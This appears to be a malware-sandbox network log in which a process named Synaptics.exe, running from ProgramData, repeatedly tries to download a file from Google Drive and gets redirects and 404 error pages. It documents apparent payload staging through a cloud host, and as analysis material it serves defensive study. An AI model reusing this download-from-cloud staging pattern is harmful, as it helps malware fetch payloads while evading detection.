                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.949764142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:33 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-8TOL2EzZPCITdjoSyrNiMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.949771142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:34 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-k4-NClUc9PU2HWWnoGZu6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.949769142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:34 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-xd4lYfDdcXhFTCgdtYujAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.949768142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:35 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5hhvi7_59EzkaTic7-WNeViVn_GBQ7zNZNPjZi73WniYXacej0UiEaqHiLIAX6O0w6n9YSd-Y
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-qE-R7FGhhX0v1n7xfM2l-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:35 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:35 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 62 57 7a 6e 38 6d 69 4c 37 6d 59 66 48 77 56 4b 4d 57 41 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="8bWzn8miL7mYfHwVKMWAQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:35 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    34192.168.2.949770142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:35 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4pVFpQkvf6F1lnoeKm562fqYMq2R5x1eJ-M76LoHGQOfTsXGH0QqipvmbVMOUWcZMEYGXl1zM
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-oeNJ12oSFSzqqjzP8VnfCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:35 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:35 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 66 68 50 6c 57 59 6c 4c 71 4a 4c 59 42 4c 49 41 41 52 69 51 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="CfhPlWYlLqJLYBLIAARiQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:35 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    35192.168.2.949773142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-yIQ1KZJpjimmswez3xQ2eA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    36192.168.2.949772142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dfix2a-6zHWo4jvcwi0UBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    37192.168.2.949774142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:36 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5CQOS6CqRfeUnv0GsHroGTZKWMzwvGwSq4i9iUCl5hIt9S9kBNrxNKP0ntknV85b38
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DxIqZbV88PZzPTAOJL9OAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:36 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:36 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 4d 54 76 69 75 45 49 35 49 6d 67 6d 31 48 31 74 54 75 4f 73 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="6MTviuEI5Imgm1H1tTuOsQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:36 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


